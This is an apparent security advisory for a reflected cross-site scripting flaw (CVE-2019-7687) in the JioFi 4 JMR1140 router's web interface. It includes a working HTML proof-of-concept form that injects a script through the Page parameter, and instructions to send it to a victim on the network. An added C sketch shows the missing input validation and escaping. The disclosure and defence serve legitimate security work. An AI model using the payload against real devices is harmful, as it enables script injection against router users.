Jiofi 4 (JMR 1140) Cross Site Scripting

2019.02.14
Credit: Ronnie T Baby
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact: https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687

Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.

1. Create a poc.html and insert

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert&#40;document.domain&#41;<&#47;script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

2. Send to victim (who is connected to the wifi network).
3. POST-based XSS gets fired.

Exploit working in Firefox Quantum, Firefox Dev Edition etc. Chrome XSS Auditor blocks this POC.
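Added example, not part of the original advisory and not the vendor's code: a sketch in C of the two server-side checks whose absence the description reports, namely validating the Page parameter before use and HTML-encoding it wherever it is echoed back. The function names, PAGE_MAX_LEN, and the assumption that legitimate Page values are plain identifiers like GetDeviceDetails are hypothetical.

```c
#include <ctype.h>
#include <string.h>

/* Assumption: legitimate Page values are short identifiers such as
 * "GetDeviceDetails" (letters, digits, underscore only). */
#define PAGE_MAX_LEN 64

/* Returns 1 if the Page value is a plain identifier, 0 otherwise. */
int page_param_is_valid(const char *page)
{
    size_t len = page ? strlen(page) : 0;
    if (len == 0 || len > PAGE_MAX_LEN)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)page[i];
        if (!isalnum(c) && c != '_')
            return 0;
    }
    return 1;
}
/* HTML-encodes src into dst (dst_size bytes, always NUL-terminated).
 * Returns 0 on success, -1 if dst is too small (output is then empty). */
int html_escape(const char *src, char *dst, size_t dst_size)
{
    size_t out = 0;
    if (dst_size == 0)
        return -1;
    for (; *src; src++) {
        const char *rep;
        char one[2] = { *src, '\0' };
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (out + n >= dst_size) {   /* keep room for the terminator */
            dst[0] = '\0';
            return -1;
        }
        memcpy(dst + out, rep, n);
        out += n;
    }
    dst[out] = '\0';
    return 0;
}
```

A handler would reject the request when page_param_is_valid() returns 0 and pass any value it still echoes through html_escape(), so the Page value from the PoC above is refused before it reaches the response.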


Copyright 2019, cxsecurity.com

 
